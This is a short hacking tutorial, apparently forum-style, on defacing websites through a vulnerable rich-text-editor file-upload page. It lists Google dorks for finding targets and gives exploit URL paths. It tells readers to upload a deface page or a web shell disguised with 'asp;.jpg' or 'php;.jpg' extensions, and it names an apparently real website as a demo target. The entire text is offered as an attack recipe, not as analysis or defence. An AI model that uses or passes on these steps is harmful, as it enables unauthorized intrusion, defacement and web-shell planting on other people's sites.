Deface with My_document upload method

Deface with My_document upload method:-

Bersama NoEntryPhc.


Google Dorks

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/

Exploit:
http://www.website.com/rte/RTE_popup_file_atch.asp
or
http://www.website.com/admin/RTE_popup_file_atch.asp


Goto Url and Upload your deface page or upload your shell as asp;.jpg or php;.jpg


demo- http://www.billkonigsberg.com/RTE_popup_file_atch.asp
You'll see Your Uploded file URL in this Box